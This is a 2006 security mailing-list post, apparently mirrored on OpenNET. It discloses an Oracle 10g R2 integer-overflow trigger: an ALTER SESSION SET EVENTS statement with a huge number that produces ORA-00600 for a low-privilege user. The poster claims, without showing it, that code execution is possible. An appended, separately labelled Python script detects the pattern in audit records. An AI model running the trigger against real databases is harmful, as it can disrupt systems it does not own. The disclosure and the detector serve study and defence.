The OpenNET Project
 


Oracle 10g R2 and, probably, all previous versions


From: "putosoft softputo" <hasecorp@hotmail.com.>
To: [email protected], [email protected]
Subject: Oracle 10g R2 and, probably, all previous versions
Date: Thu, 27 Jul 2006 19:23:41 +0000
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1; format=flowed
X-OriginalArrivalTime: 27 Jul 2006 19:23:45.0290 (UTC) FILETIME=[2D8936A0:01C6B1B2]
X-Virus-Scanned: antivirus-gw at tyumen.ru

I can't believe it. Oracle releases new patches and they have not 
solved one of the main problems: A user with only the SELECT privilege can 
do WHATEVER (S)HE WANTS WITH THE ENTIRE DATABASE!!!!

I'm not sure if it is time to fully disclose it but, anyway, I will "full 
disclosure" one innocent issue, an integer overflow:

Example:
--Connect with any user with only CREATE SESSION
SQL> alter session set events '10046 trace name context forever, level 16';

Session altered.

SQL> alter session set events 
'10046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004
61004610046100461004610046100461004610046100461004610046100461004610046100461004610046trace 
name context forever, level 16';
ERROR:
ORA-00600: internal error code, arguments: [300], [985], [], [], [], [], [], 
[]


It's not even a crash but (be sure) there are other "combinations" that 
make it vulnerable to integer overflows allowing the execution of 
arbitrary code.

P.S.: Hello Mary Ann! Are you on holidays?

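A defender-side check for the statement pattern shown in the message, as an added example that is not part of the original post: it flags ALTER SESSION SET EVENTS statements whose event spec contains an implausibly long number and records any ORA-00600 argument logged with them. The record layout (user, SQL text, error text), the 10-digit threshold and the sample records are assumptions constructed for illustration.

```python
import re

# Assumption: no legitimate number in an event spec needs more than 10 decimal
# digits (the longest a 32-bit value can be); 10046 itself is five digits.
MAX_DIGITS = 10

SET_EVENTS = re.compile(r"alter\s+session\s+set\s+events\s*'([^']*)'", re.I)
ORA600 = re.compile(r"ORA-00600:[^\[]*\[(\d*)\]")

def longest_number(sql):
    """Length of the longest digit run in any SET EVENTS spec in sql (0 if none)."""
    longest = 0
    for spec in SET_EVENTS.findall(sql):
        spec = re.sub(r"[\r\n]+", "", spec)  # rejoin numbers split by line wrapping
        for run in re.findall(r"\d+", spec):
            longest = max(longest, len(run))
    return longest

def scan(records):
    """records: iterable of (user, sql_text, error_text); returns flagged entries."""
    findings = []
    for user, sql, error in records:
        n = longest_number(sql)
        if n <= MAX_DIGITS:
            continue  # ordinary event spec, or not a SET EVENTS statement
        m = ORA600.search(error or "")
        findings.append({
            "user": user,
            "digits": n,
            "ora600_arg": m.group(1) if m else None,  # first ORA-00600 argument
        })
    return findings

# Constructed sample records (hypothetical users, not real audit data).
SAMPLE = [
    ("SCOTT", "alter session set events '10046 trace name context forever, level 16'", ""),
    ("APPUSER", "alter session set events '" + "10046" * 40 + "\n" + "10046" * 3
                + "trace name context forever, level 16'",
     "ORA-00600: internal error code, arguments: [300], [985], [], [], [], [], [], []"),
    ("HR", "select * from dual", ""),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```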


